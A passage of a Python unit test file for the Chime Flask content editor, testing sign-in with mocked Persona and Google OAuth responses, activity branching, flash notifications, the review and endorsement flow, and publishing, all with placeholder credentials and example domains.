from multiprocessing import Process
import time
import logging
import tempfile
logging.disable(logging.CRITICAL)
repo_root = abspath(join(dirname(__file__), '..'))
sys.path.insert(0, repo_root)
from box.util.rotunicode import RotUnicode
from httmock import response, HTTMock
from mock import MagicMock, patch
from bs4 import Comment, BeautifulSoup
from chime import (
create_app, repo_functions, google_api_functions, view_functions,
publish, errors)
from chime import constants
from chime import chime_activity
from unit.chime_test_client import ChimeTestClient
import codecs
codecs.register(RotUnicode.search_function)
# these patterns help us search the HTML of a response to determine if the expected page loaded
PATTERN_BRANCH_COMMENT = u'<!-- branch: {} -->'
PATTERN_AUTHOR_COMMENT = u'<!-- author: {} -->'
PATTERN_TASK_COMMENT = u'<!-- task: {} -->'
PATTERN_TEMPLATE_COMMENT = u'<!-- template name: {} -->'
PATTERN_FILE_COMMENT = u'<!-- file type: {file_type}, file name: {file_name}, file title: {file_title} -->'
PATTERN_OVERVIEW_ITEM_CREATED = u'<p>The "{created_name}" {created_type} was created by {author_email}.</p>'
PATTERN_OVERVIEW_ACTIVITY_STARTED = u'<p>The "{activity_name}" activity was started by {author_email}.</p>'
PATTERN_OVERVIEW_COMMENT_BODY = u'<div class="comment__body">{comment_body}</div>'
PATTERN_OVERVIEW_ITEM_DELETED = u'<p>The "{deleted_name}" {deleted_type} {deleted_also}was deleted by {author_email}.</p>'
PATTERN_FLASH_TASK_DELETED = u'You deleted the "{description}" activity!'
PATTERN_FLASH_CREATED_CATEGORY = u'Created a new topic named {title}! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_SAVED_CATEGORY = u'Saved changes to the {title} topic! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_CREATED_ARTICLE = u'Created a new article named {title}! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_SAVED_ARTICLE = u'Saved changes to the {title} article! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_DELETED_CATEGORY = u'The "{title}" topic {containing}was deleted! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FLASH_DELETED_ARTICLE = u'The "{title}" article was deleted! Remember to submit this change for feedback when you\'re ready to go live.'
PATTERN_FORM_CATEGORY_TITLE = u'<input name="en-title" type="text" value="{title}" class="directory-modify__name" placeholder="Crime Statistics and Maps">'
PATTERN_FORM_CATEGORY_DESCRIPTION = u'<textarea name="en-description" class="directory-modify__description" placeholder="Crime statistics and reports by district and map">{description}</textarea>'
# review stuff
PATTERN_UNREVIEWED_EDITS_LINK = u'<a href="/tree/{branch_name}/edit/">'
PATTERN_FEEDBACK_REQUESTED_LINK = u'<a href="/tree/{branch_name}/" class="toolbar__item button">Feedback requested</a>'
PATTERN_READY_TO_PUBLISH_LINK = u'<a href="/tree/{branch_name}/" class="toolbar__item button">Ready to publish</a>'
class TestAppConfig (TestCase):
# in TestAppConfig
def test_missing_values(self):
self.assertRaises(KeyError, lambda: create_app({}))
# in TestAppConfig
def test_present_values(self):
create_app_environ = {}
create_app_environ['RUNNING_STATE_DIR'] = 'Yo'
create_app_environ['GA_CLIENT_ID'] = 'Yo'
create_app_environ['GA_CLIENT_SECRET'] = 'Yo'
create_app_environ['LIVE_SITE_URL'] = 'Hey'
create_app_environ['BROWSERID_URL'] = 'Hey'
create_app(create_app_environ)
# in TestAppConfig
def test_error_template_args(self):
''' Default error template args are generated as expected
'''
create_app_environ = {}
create_app_environ['RUNNING_STATE_DIR'] = 'Yo'
create_app_environ['GA_CLIENT_ID'] = 'Yo'
create_app_environ['GA_CLIENT_SECRET'] = 'Yo'
create_app_environ['BROWSERID_URL'] = 'Hey'
create_app_environ['LIVE_SITE_URL'] = 'Hey'
fake_support_email = u'support@example.com'
fake_support_phone_number = u'(123) 456-7890'
create_app_environ['SUPPORT_EMAIL_ADDRESS'] = fake_support_email
create_app_environ['SUPPORT_PHONE_NUMBER'] = fake_support_phone_number
app = create_app(create_app_environ)
template_args = errors.common_error_template_args(app.config)
self.assertEqual(len(template_args), 3)
self.assertTrue('activities_path' in template_args)
self.assertTrue('support_email' in template_args)
self.assertTrue('support_phone_number' in template_args)
self.assertEqual(template_args['support_email'], fake_support_email)
self.assertEqual(template_args['support_phone_number'], fake_support_phone_number)
# in TestAppConfig
def test_for_constant_name_conflicts(self):
''' None of the constant names defined in constants.py conflict with reserved config variable names
'''
flask_reserved_config_names = ['DEBUG', 'TESTING', 'PROPAGATE_EXCEPTIONS', 'PRESERVE_CONTEXT_ON_EXCEPTION', 'SECRET_KEY', 'SESSION_COOKIE_NAME', 'SESSION_COOKIE_DOMAIN', 'SESSION_COOKIE_PATH', 'SESSION_COOKIE_HTTPONLY', 'SESSION_COOKIE_SECURE', 'PERMANENT_SESSION_LIFETIME', 'USE_X_SENDFILE', 'LOGGER_NAME', 'SERVER_NAME', 'APPLICATION_ROOT', 'MAX_CONTENT_LENGTH', 'SEND_FILE_MAX_AGE_DEFAULT', 'TRAP_HTTP_EXCEPTIONS', 'TRAP_BAD_REQUEST_ERRORS', 'PREFERRED_URL_SCHEME', 'JSON_AS_ASCII', 'JSON_SORT_KEYS', 'JSONIFY_PRETTYPRINT_REGULAR']
chime_reserved_config_names = ['RUNNING_STATE_DIR', 'REPO_PATH', 'WORK_PATH', 'AUTH_DATA_HREF', 'BROWSERID_URL', 'GA_CLIENT_ID', 'GA_CLIENT_SECRET', 'GA_REDIRECT_URI', 'SUPPORT_EMAIL_ADDRESS', 'SUPPORT_PHONE_NUMBER', 'GDOCS_CLIENT_ID', 'GDOCS_CLIENT_SECRET', 'GITHUB_CLIENT_ID', 'GITHUB_CLIENT_SECRET', 'LIVE_SITE_URL', 'PUBLISH_SERVICE_URL']
check_names = flask_reserved_config_names + chime_reserved_config_names
for reserved_name in check_names:
self.assertFalse(hasattr(constants, reserved_name), u'The reserved config variable name {} is present in constants!'.format(reserved_name))
class TestApp (TestCase):
def setUp(self):
self.old_tempdir, tempfile.tempdir = tempfile.tempdir, mkdtemp(prefix='chime-TestApp-')
self.work_path = mkdtemp(prefix='chime-repo-clones-')
self.publish_path = mkdtemp(prefix='chime-publish-path-')
repo_path = dirname(abspath(__file__)) + '/../test-app.git'
temp_repo_dir = mkdtemp(prefix='chime-root')
temp_repo_path = temp_repo_dir + '/test-app.git'
copytree(repo_path, temp_repo_path)
self.origin = ChimeRepo(temp_repo_path)
repo_functions.ignore_task_metadata_on_merge(self.origin)
self.clone1 = self.origin.clone(mkdtemp(prefix='chime-'))
repo_functions.ignore_task_metadata_on_merge(self.clone1)
fake_author_email = u'erica@example.com'
self.session = dict(email=fake_author_email)
environ['GIT_AUTHOR_NAME'] = ' '
environ['GIT_COMMITTER_NAME'] = ' '
environ['GIT_AUTHOR_EMAIL'] = self.session['email']
environ['GIT_COMMITTER_EMAIL'] = self.session['email']
create_app_environ = {}
create_app_environ['SINGLE_USER'] = 'Yes'
create_app_environ['GA_CLIENT_ID'] = 'client_id'
create_app_environ['GA_CLIENT_SECRET'] = 'meow_secret'
self.ga_config_dir = mkdtemp(prefix='chime-config-')
create_app_environ['RUNNING_STATE_DIR'] = self.ga_config_dir
create_app_environ['WORK_PATH'] = self.work_path
create_app_environ['REPO_PATH'] = temp_repo_path
create_app_environ['AUTH_DATA_HREF'] = 'http://example.com/auth.csv'
create_app_environ['BROWSERID_URL'] = 'http://localhost'
create_app_environ['LIVE_SITE_URL'] = 'http://example.org/'
create_app_environ['PUBLISH_PATH'] = self.publish_path
create_app_environ['SUPPORT_EMAIL_ADDRESS'] = u'support@example.com'
create_app_environ['SUPPORT_PHONE_NUMBER'] = u'(123) 456-7890'
self.app = create_app(create_app_environ)
# write a tmp config file
config_values = {
"access_token": "meowser_token",
"refresh_token": "refresh_meows",
"profile_id": "12345678",
"project_domain": ""
}
with self.app.app_context():
google_api_functions.write_ga_config(config_values, self.app.config['RUNNING_STATE_DIR'])
random.choice = MagicMock(return_value="P")
self.test_client = self.app.test_client()
def tearDown(self):
rmtree(tempfile.tempdir)
tempfile.tempdir = self.old_tempdir
def auth_csv_example_disallowed(self, url, request):
if url.geturl() == 'http://example.com/auth.csv':
return response(200, '''Email domain,Organization\n''')
raise Exception('Asked for unknown URL ' + url.geturl())
def auth_csv_example_allowed(self, url, request):
if url.geturl() == 'http://example.com/auth.csv':
return response(200, '''Email domain,Organization\nexample.com,Example Org\n*,Anyone''')
raise Exception('Asked for unknown URL ' + url.geturl())
def mock_persona_verify_erica(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "erica@example.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_non_roman(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "੯ूᵕू ໒꒱ƶƵ@快速狐狸.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_frances(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "frances@example.com"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_persona_verify_william(self, url, request):
if url.geturl() == 'https://verifier.login.persona.org/verify':
return response(200, '''{"status": "okay", "email": "william@example.org"}''', headers=dict(Link='<https://api.github.com/user/337792/repos?page=1>; rel="prev", <https://api.github.com/user/337792/repos?page=1>; rel="first"'))
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_authorization(self, url, request):
if 'https://accounts.google.com/o/oauth2/auth' in url.geturl():
return response(200, '''{"access_token": "meowser_token", "token_type": "meowser_type", "refresh_token": "refresh_meows", "expires_in": 3920}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_successful_google_callback(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_TOKENS_URL in url.geturl():
return response(200, '''{"access_token": "meowser_token", "token_type": "meowser_type", "refresh_token": "refresh_meows", "expires_in": 3920}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
elif google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"items": [{"defaultProfileId": "12345678", "name": "Property One", "websiteUrl": "http://propertyone.example.com"}, {"defaultProfileId": "87654321", "name": "Property Two", "websiteUrl": "http://propertytwo.example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_failed_google_callback(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_TOKENS_URL in url.geturl():
return response(500, '''{}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
elif google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"items": [{"defaultProfileId": "12345678", "name": "Property One", "websiteUrl": "http://propertyone.example.com"}, {"defaultProfileId": "87654321", "name": "Property Two", "websiteUrl": "http://propertytwo.example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_invalid_credentials_response(self, url, request):
if 'https://www.googleapis.com/analytics/' in url.geturl() or google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(401, '''{"error": {"code": 401, "message": "Invalid Credentials", "errors": [{"locationType": "header", "domain": "global", "message": "Invalid Credentials", "reason": "authError", "location": "Authorization"}]}}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(403, '''{"error": {"code": 403, "message": "Access Not Configured. The API (Google+ API) is not enabled for your project. Please use the Google Developers Console to update your configuration.", "errors": [{"domain": "usageLimits", "message": "Access Not Configured. The API (Google+ API) is not enabled for your project. Please use the Google Developers Console to update your configuration.", "reason": "accessNotConfigured", "extendedHelp": "https://console.developers.google.com"}]}}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_no_properties_response(self, url, request):
if google_api_functions.GOOGLE_ANALYTICS_PROPERTIES_URL in url.geturl():
return response(200, '''{"kind": "analytics#webproperties", "username": "erica@example.com", "totalResults": 0, "startIndex": 1, "itemsPerPage": 1000, "items": []}''')
elif google_api_functions.GOOGLE_PLUS_WHOAMI_URL in url.geturl():
return response(200, '''{"displayName": "Jane Doe", "emails": [{"type": "account", "value": "erica@example.com"}]}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_google_analytics(self, url, request):
start_date = (date.today() - timedelta(days=7)).isoformat()
end_date = date.today().isoformat()
url_string = url.geturl()
if 'ids=ga%3A12345678' in url_string and 'end-date=' + end_date in url_string and 'start-date=' + start_date in url_string and 'filters=ga%3ApagePath%3D~%28hello.html%7Chello%29' in url_string:
return response(200, '''{"ga:previousPagePath": "/about/", "ga:pagePath": "/lib/", "ga:pageViews": "12", "ga:avgTimeOnPage": "56.17", "ga:exiteRate": "43.75", "totalsForAllResults": {"ga:pageViews": "24", "ga:avgTimeOnPage": "67.36363636363636"}}''')
else:
return self.auth_csv_example_allowed(url, request)
def mock_internal_server_error(self, url, request):
from flask import abort
abort(500)
def mock_exception(self, url, request):
raise Exception(u'This is a generic exception.')
# in TestApp
def test_no_cache_headers(self):
''' The expected no-cache headers are in the server response.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
erica.open_link(constants.ROUTE_ACTIVITY)
# The static no-cache headers are as expected
self.assertEqual(erica.headers['Cache-Control'], 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0')
self.assertEqual(erica.headers['Pragma'], 'no-cache')
self.assertEqual(erica.headers['Expires'], '-1')
# The last modified date is within 10 seconds of now
last_modified = datetime.strptime(erica.headers['Last-Modified'], '%Y-%m-%d %H:%M:%S.%f')
delta = datetime.now() - last_modified
self.assertTrue(delta.seconds < 10)
# in TestApp
def test_bad_login(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('erica@example.com' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_disallowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Create' in response.data)
# in TestApp
def test_login(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
self.assertTrue('http://example.org' in response.data, 'Should see LIVE_SITE_URL in response')
response = self.test_client.post('/sign-out')
self.assertEqual(response.status_code, 200)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
# in TestApp
def test_login_splat(self):
''' Check basic log in / log out flow without talking to Persona.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_william):
response = self.test_client.post('/sign-in', data={'assertion': 'william@example.org'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
# in TestApp
def test_default_auth_href_warning(self):
''' A warning is shown when the default AUTH_DATA_HREF value is in use.
'''
with patch('chime.view_functions.AUTH_DATA_HREF_DEFAULT', new='http://example.com/auth.csv'):
response = self.test_client.get('/not-allowed')
expected = 'Your Chime <code>AUTH_DATA_HREF</code> is set to default value.'
self.assertTrue(expected in response.data, 'Should see a warning')
# in TestApp
@patch('chime.view_functions.AUTH_CHECK_LIFESPAN', new=1.0)
def test_login_timeout(self):
''' Check basic log in / log out flow with auth check lifespan.
'''
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertTrue('Start' in response.data)
with patch('chime.view_functions.get_auth_data_file') as get_auth_data_file:
# Show that email status does not require a call to auth CSV.
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(response.status_code, 200, 'Should have worked')
self.assertEqual(get_auth_data_file.call_count, 0, 'Should not have called get_auth_data_file()')
# Show that a call to auth CSV was made, outside the timeout period.
time.sleep(1.1)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(get_auth_data_file.call_count, 1, 'Should have called get_auth_data_file()')
with HTTMock(self.auth_csv_example_allowed):
# Show that email status was correctly updated with a call to the auth CSV.
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertEqual(response.status_code, 200, 'Should have worked')
response = self.test_client.post('/sign-out')
self.assertEqual(response.status_code, 200)
response = self.test_client.get(constants.ROUTE_ACTIVITY)
self.assertFalse('Start' in response.data)
# in TestApp
def test_need_description_to_start_activity(self):
''' You need a description to start a new activity
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
flash_message_text = u'Please describe what you\'re doing when you start a new activity!'
# start a new task without a description
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'')
# the activities-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'activities-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(flash_message_text, erica.soup.find('li', class_='flash').text)
# in TestApp
def test_whitespace_stripped_from_description(self):
''' Carriage returns, tabs, spaces are stripped from task descriptions before they're saved.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# start a new task with a lot of random whitespace
erica.open_link(constants.ROUTE_ACTIVITY)
task_description = u'I think\n\r\n\rI am so \t\t\t coool!!\n\n\nYeah.\n\nOK\n\rERWEREW dkkdk'
task_description_stripped = u'I think I am so coool!! Yeah. OK ERWEREW dkkdk'
erica.start_task(description=task_description)
# the stripped comment is in the HTML
pattern_task_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TASK_COMMENT)
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_task_comment_stripped.format(task_description_stripped) in comments)
# the stripped comment is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, erica.get_branch_name())
self.assertEqual(task_description_stripped, task_metadata['task_description'])
# in TestApp
def test_notification_on_create_category(self):
''' You get a flash notification when you create a category
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Lick Water Droplets From Leaves for Leopard Geckos')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Rubber Plants'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# the category is correctly represented on the page
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_name in tag.text)))
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_slug in tag['href'])))
# a flash message appeared
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=category_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_notifications_on_create_edit_and_delete_article(self):
''' You get a flash notification when you create an article
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Lick Water Droplets From Leaves for Leopard Geckos')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category and sub-category
category_name = u'Rubber Plants'
subcategory_name = u'Leaves'
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
subcategory_path = erica.path
# Create an article
article_name = u'Water Droplets'
erica.add_article(article_name=article_name)
# a flash message appeared
self.assertEqual(PATTERN_FLASH_CREATED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# edit the article
erica.edit_article(title_str=article_name, body_str=u'Watch out for poisonous insects.')
# a flash message appeared
self.assertEqual(PATTERN_FLASH_SAVED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# delete the article
erica.open_link(subcategory_path)
erica.delete_article(article_name)
# a flash message appeared
self.assertEqual(PATTERN_FLASH_DELETED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_branches(self):
''' Check basic branching functionality.
'''
fake_task_description = u'do things for somebody else'
fake_author_email = u'erica@example.com'
fake_endorser_email = u'frances@example.com'
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
fake_page_content = u'People of earth we salute you.'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(fake_task_description) in response.data)
self.assertTrue(PATTERN_AUTHOR_COMMENT.format(fake_author_email) in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
# get the index page for the branch and verify that the new file is listed
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_BRANCH_COMMENT.format(generated_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": fake_page_slug, "file_title": fake_page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name, fake_page_path))
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
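# the edit form carries a hidden 'hexsha' input recording the commit the page was rendered from;
# the save request below posts that value back along with the new content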
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': 'Greetings',
'en-body': u'{}\n'.format(fake_page_content),
'fr-title': '', 'fr-body': '',
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
self.assertTrue(fake_page_content in response.data)
# Request feedback on the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_author_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE) in response.data)
#
#
# Log in as a different person
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_endorser_email})
# Endorse the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_endorser_email, repo_functions.ACTIVITY_ENDORSED_MESSAGE) in response.data)
# And publish the change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# should've been redirected to the front page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activities-list') in response.data)
# the activity we just published should be listed under 'recently published activities'
self.assertTrue(generated_branch_name in response.data)
self.assertTrue(response.data.find(generated_branch_name) > response.data.find(u'Recently Published Activities'))
# Look in the published directory and see if the words are there.
with open(join(self.publish_path, fake_page_slug, 'index.html')) as file:
self.assertTrue(fake_page_content in file.read())
# in TestApp
def test_delete_strange_tasks(self):
''' Delete a task that you can see on the activity list but haven't viewed or edited.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
disposable_task_description = u'unimportant task for unimportant person'
response = self.test_client.post('/start', data={'task_description': disposable_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(disposable_task_description) in response.data)
# create a branch programmatically on our pre-made clone
check_task_description = u'Creating a Star Child for Ancient Aliens'
check_branch = repo_functions.get_start_branch(self.clone1, 'master', check_task_description, fake_author_email)
self.assertTrue(check_branch.name in self.clone1.branches)
self.assertTrue(check_branch.name in self.origin.branches)
# verify that the branch doesn't exist in our new clone
with self.app.app_context():
with self.app.test_request_context():
from flask import session
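# get_repo reads the signed-in email from the session, so set it before requesting a clone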
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
self.assertFalse(check_branch.name in new_clone.branches)
# load the activity list and verify that the branch is visible there
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(check_branch.name in response.data)
# Delete the activity
response = self.test_client.post('/update', data={'abandon': 'Delete', 'branch': '{}'.format(check_branch.name)}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertFalse(check_branch.name in response.data)
# in TestApp
def test_review_process(self):
''' Check the review process
'''
fake_task_description = u'groom pets for pet owners'
fake_author_email = u'erica@example.com'
fake_endorser_email = u'frances@example.com'
fake_page_slug = u'hello'
# log in
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the edited column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-edited")[0]
# there should be an HTML comment with the branch name
comments = pub_ul.findAll(text=lambda text: isinstance(text, Comment))
found = False
for comment in comments:
if generated_branch_name in comment:
found = True
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
self.assertEqual(True, found)
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'request feedback' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "request-feedback-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'request feedback' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "request-feedback-button"}))
# get the activity list page
